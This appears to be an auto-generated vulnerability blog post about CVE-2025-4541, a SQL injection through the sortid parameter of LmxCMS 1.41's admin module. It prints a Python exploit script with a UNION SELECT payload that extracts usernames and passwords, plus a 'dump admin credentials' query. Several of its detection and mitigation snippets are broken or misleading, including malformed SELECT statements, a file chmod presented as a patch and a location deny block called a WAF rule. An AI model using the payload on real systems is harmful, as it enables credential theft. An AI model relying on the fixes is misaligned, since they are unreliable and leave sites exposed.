LmxCMS, SQL Injection, CVE-2025-4541 (Critical)

Listen to this Post

How CVE-2025-4541 Works

The vulnerability exists in the `manageZt` function within `c\admin\ZtAction.class.php` of LmxCMS 1.41. The `sortid` parameter passed via POST requests is not properly sanitized before being used in SQL queries, allowing attackers to inject malicious SQL commands. This flaw enables unauthorized database access, potentially leading to data theft, manipulation, or deletion. The attack can be executed remotely without authentication, making it critical.

DailyCVE Form

Platform: LmxCMS
Version: 1.41
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch by 08/2025

What Undercode Say:

Exploitation

import requests
target = "http://example.com/admin/ZtAction.class.php"
payload = {"sortid": "1' UNION SELECT username, password FROM users--"}
response = requests.post(target, data=payload)
print(response.text)

Detection

-- Check for unsanitized inputs
SELECT FROM logs WHERE query LIKE '%sortid=%';

Mitigation

1. Input Validation

$sortid = mysqli_real_escape_string($conn, $_POST['sortid']);

2. Patch

Temporary workaround
chmod 640 c/admin/ZtAction.class.php

3. WAF Rules

location /admin {
deny all;
}

Analytics

  • Attack Vector: Remote (HTTP POST)
  • Privilege Escalation: Possible via DB compromise
  • Exploit Complexity: Low

Post-Exploit

-- Dump admin credentials
SELECT FROM admins;

Protection

// Use prepared statements
$stmt = $conn->prepare("UPDATE table SET col=? WHERE id=?");
$stmt->bind_param("si", $sortid, $id);

Logging

Monitor suspicious requests
tail -f /var/log/apache2/access.log | grep 'POST /admin'

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top